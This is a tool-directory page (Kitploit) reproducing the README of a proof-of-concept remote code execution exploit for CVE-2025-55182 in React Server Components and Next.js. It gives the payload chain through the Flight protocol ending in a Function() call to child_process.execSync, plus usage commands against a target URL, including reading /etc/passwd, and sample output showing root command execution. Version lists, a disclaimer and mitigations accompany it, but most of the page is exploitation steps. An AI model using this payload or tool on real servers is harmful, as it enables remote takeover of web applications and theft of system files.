Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-55182_PoC — Proof-of-Concept RCE pour CVE‑2025‑55182 exploitant le protocole React Flight sur Next.js App Router. | Kitploit
Tools/GitHubGitHub/rl0x01/cve-2025-55182_poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubrl0x01/cve-2025-55182_poc

CVE-2025-55182_PoC

Proof-of-Concept RCE pour CVE‑2025‑55182 exploitant le protocole React Flight sur Next.js App Router.

View Repository
169 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-55182 - React Server Components RCE PoC

Author: rl0x01

Description

CVE-2025-55182 is a critical (CVSS 10.0) Remote Code Execution (RCE) vulnerability affecting React Server Components via the Flight protocol.

Vulnerable Versions

Next.jsReact
14.3.0-canary.77 to 15.0.419.0.0
15.1.1-canary.0 to 15.1.819.1.0
15.2.0-canary.0 to 15.2.519.1.1
15.3.0-canary.0 to 15.3.519.2.0
15.4.0-canary.0 to 15.4.7
15.5.1-canary.0 to 15.5.6
16.0.0-canary.0 to 16.0.6

Fixed Versions

Next.js
15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7+

Exploitation Mechanism

  1. Uses $@ to get a raw Chunk reference
  2. Overwrites .then with Chunk.prototype.then via $1:__proto__:then
  3. Sets status to resolved_model to trigger initializeModelChunk
  4. Uses $B1337 to trigger Blob deserialization
  5. Points _formData.get to Function constructor
  6. _prefix contains the JS code to execute

The code is evaluated via:

Function("throw new Error(require('child_process').execSync('COMMAND').toString());//1337")

Installation

pip install -r requirements.txt

Usage

Check if target is vulnerable

python cve_2025_55182_poc.py https://target.com --check-only

Execute a command

# Default command (id)
python cve_2025_55182_poc.py https://target.com

# Custom command
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"

Options

OptionDescription
urlTarget URL (required)
-c, --commandCommand to execute (default: id)
--check-onlyOnly check vulnerability
-t, --timeoutTimeout in seconds (default: 15)
-v, --verboseVerbose output
--rawShow raw response

Vulnerable Test Lab

cd vulnerable-app
npm install
npm run dev
# Server at http://localhost:3000

Example Output

+======================================================================+
|  CVE-2025-55182 - React Server Components RCE                     |
|  React Flight Protocol Deserialization Vulnerability               |
+======================================================================+
[*] Affected: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] CVSS Score: 10.0 (CRITICAL)
[*] Author: rl0x01

[*] Target: http://localhost:3000
[*] Timeout: 15s

[1/2] Checking vulnerability...
[+] VULNERABLE! RCE Confirmed - Output received

[2/2] Executing command: whoami
[+] Payload sent!

============================================================
RESULT: whoami
============================================================
root
============================================================

Project Structure

CVE-2025-55182/
├── cve_2025_55182_poc.py    # Main exploit script
├── requirements.txt          # Python dependencies
├── README.md                 # Documentation
└── vulnerable-app/           # Vulnerable Next.js app for testing
    ├── package.json
    ├── next.config.js
    └── app/
        ├── layout.js
        ├── page.js
        └── actions.js

Disclaimer

⚠️ This tool is provided for educational and authorized security testing purposes only.

Unauthorized use of this tool against systems you do not own or have explicit permission to test is illegal.

Mitigation

  1. Update Next.js to 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+, or 16.0.7+
  2. Update React to a patched version
  3. Implement WAF rules to block malicious Flight protocol payloads
Download Tool